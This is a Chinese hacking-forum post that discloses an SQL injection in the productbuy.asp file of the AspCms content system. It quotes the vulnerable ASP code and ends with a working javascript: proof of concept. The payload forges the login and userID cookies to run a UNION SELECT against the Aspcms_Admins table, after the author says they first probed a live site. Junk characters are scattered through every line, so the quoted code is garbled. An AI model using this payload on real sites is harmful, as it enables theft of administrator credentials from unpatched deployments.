好久没上土司了,上来一看发现在删号名单内.....1 C! }/ m8 f7 d }/ O
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。% {# V, L' W6 K/ {; z5 R* b A' j
废话不多说,看代码:9 v7 u+ i* w& ?0 @5 S0 e) [/ h
~ D6 s/ Z( Z4 k! Z: e<%
# m1 m' \" f& Z# \' V: I* q/ s5 Q1 B3 ]9 M
if action = "buy" then
3 r' w* {% T' U) b! _! b& p
* ?2 B! V" s7 R4 F* N. i addOrder()
. ?0 V N* q8 L7 \- Q p
4 C& }" r* _5 C- K& ]( `else
2 d$ m" k8 Y+ {; R, G- C) p; ?' `+ g2 H
echoContent()( j1 x* i a6 r
2 z( Z" H; C0 D) P) Y! I2 J; G
end if
) V) v. \8 s# \1 U7 o" q* {3 X4 ?9 L. t) `8 w& M: |: D
+ R8 t; D. _8 J* O c) J
; T6 O9 c4 p$ m9 h……略过+ _4 ~6 I* S! j' D! m9 |5 X
2 P6 w% i* U& P* |- z5 t2 c3 u/ x; I# p- u
/ \: r2 Q& F1 {
5 n3 [7 s) _: p$ h- r! JSub echoContent() U( D+ F. C4 K
8 c' G, i$ h T9 F5 j% p* v: _! A
dim id# |7 Z! F( [6 O5 H0 B7 O# U
( N' P3 A9 J2 m+ v- v. u3 Q8 f id=getForm("id","get")
/ t8 {6 a! o, w$ h
: _8 b. o5 l7 ]/ i1 j1 w, @ ! g! u1 D9 Q' f$ |1 }7 @% `% v
9 @8 \ f0 U; ?! _% G if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
# P0 L4 \2 o9 o! U3 s" ~) R, }3 w( p
8 u) ]" e) {/ M- T: h. K; _9 }" a$ q& |* ?+ d7 }4 f+ T- o
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
! c; i4 G0 y [8 a& N2 J; Z8 b$ W2 q
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
8 d3 B4 K w# G, o9 n" @+ x' g
2 o7 K" b- A2 j Dim templatePath,tempStr% W) J0 ~# i$ F
& O4 i0 w& I% a: T! k: J1 f3 i& w templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
; a) e- G0 d3 ]
4 V1 L. ?# w9 m" ?' a8 [: h2 i$ m& k/ V! t
( a8 V2 i& T* t- r9 C set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")0 A' B3 m6 ~* O7 S* {
8 E# b* ]9 C# } selectproduct=rsObj(0)* M5 J w: O5 D2 I7 J! x2 G
1 U; n6 B+ x# E. y* V4 t6 ~/ C
* G Y: l c8 i
8 I, q' e' m: R, T5 p Dim linkman,gender,phone,mobile,email,qq,address,postcode
/ f2 t' v& ~0 u% G& W
* o2 z$ _3 S/ d8 m- L if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0+ T$ l% y; _4 i
, O; R" _+ G* b5 {* M if rCookie("loginstatus")=1 then ; `' K2 X! P' m
; K% K' |3 _, b/ Q. r+ q
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")% J% U2 |# B! m
/ m1 \. i1 b" Z; K
linkman=rsObj("truename")
- e8 l% r8 _4 D' R- Q/ N
3 u- I# v" Z8 z gender=rsObj("gender")( H; I# M) u% R" I0 a
6 e4 E0 m- p# v
phone=rsObj("phone")
' m) q% F# T$ D. k7 U; c5 ^' d# k* N# ~
mobile=rsObj("mobile")
& _8 |% G ?! H% h2 O+ V
# B( z$ K- D9 m r3 M& W8 l email=rsObj("email")
) j# [/ c- r# l2 A/ ^2 t6 P4 v
/ A: z( F( ?$ K& ?& Z/ M qq=rsObj("qq")* {* H1 o. L$ y* ?; {) ^
1 Z+ s; R" f; l address=rsObj("address")
" S' ~% s* p) B8 {
2 y( W! j7 F; N+ y postcode=rsObj("postcode")8 m- Q. t' Q5 e; ~& t2 \
/ J5 Q! T% M" l; I
else @% {; {6 W: |0 S: l) \! \
: w" s \" i% J# M+ r2 \9 A
gender=1
5 U" x+ h ]* f$ r4 J6 ?# Y
' D+ Q( k1 B. w" q end if# L2 W- ?; H( k D
; A$ g2 A5 |1 a; x/ S& X3 D
rsObj.close()
+ C( A+ B v$ G" S' w5 ~! {3 A% N% ~
- T! F& J, z) m* R% H$ G
; Z6 |- u3 O/ ^. p3 m
with templateObj
. ]" _. {5 ?6 z7 @( q: b, P" ?) L, I$ z- [/ H; Q% O& x+ W3 U7 I
.content=loadFile(templatePath) 2 Q( F* v* I, g$ h* s
- g' n$ R0 L8 ?: G# f! Y .parseHtml()1 @+ ~% t# `! h5 i* Z4 i/ R# \5 Y
: h$ _( g7 y, S8 C" w0 J0 K; F
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
8 {6 ], X2 P' h# m1 v8 ~' u( O! H+ t7 _; I# K& R2 q
.content=replaceStr(.content,"[aspcms:linkman]",linkman) ! }/ o2 J$ p$ L. v
1 P1 ?4 L% y9 `/ c9 `% l- F; b7 | .content=replaceStr(.content,"[aspcms:gender]",gender)
1 N) i/ J, G0 `8 b
: y0 Q. r5 A: I8 B8 l .content=replaceStr(.content,"[aspcms:phone]",phone) % ~$ i( I; b9 h: _+ \
# {, G `# v! {+ G: G# n& s9 a
.content=replaceStr(.content,"[aspcms:mobile]",mobile) 1 Z% T# w3 C0 U7 {7 G/ b4 u; b! C
- q/ k) B' |1 h. }, O& p
.content=replaceStr(.content,"[aspcms:email]",email)
' y- F7 O6 g1 i3 x. b' c. X- Z5 D. y: z5 t+ D) k$ B
.content=replaceStr(.content,"[aspcms:qq]",qq)
, X3 K6 l& B5 \5 V [3 i' o- U; Q6 O* F) |& e% G& f6 j
.content=replaceStr(.content,"[aspcms:address]",address) ) ]1 D& S3 |0 R2 B& V' T3 o- L
9 K. e& R# x- Q8 E# F/ _
.content=replaceStr(.content,"[aspcms:postcode]",postcode) 3 u% x! r) ^3 K( f
! z/ k, F7 X2 e4 h .parseCommon() 8 ], G R9 j! Y* L% d C
9 B& i) G- O0 m/ V% D* i; S& S2 R0 S% E echo .content & a' K2 d& J5 [& r. ~: _
6 ?: R) V8 U; U, J+ y1 z; r end with* l4 H* V) ^) x1 ]
2 j& a, J& P6 {9 n' H1 z set templateobj =nothing : terminateAllObjects0 n+ e7 N6 u3 Y: |
) {& M/ ^) u+ M( w1 s7 K eEnd Sub" F& c! y! A( a+ x+ m( t4 K
漏洞很明显,没啥好说的# y9 Y8 w$ ]% @. h
poc:' H4 k0 {2 q( }6 N3 v
* q8 B. W2 n6 `! Q# xjavascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
3 d' b4 }$ f" c& H0 w( T- |. |: k9 J( v+ P0 `5 j+ m" w
|
发表于 2012-12-27 08:35:05
收藏
支持
反对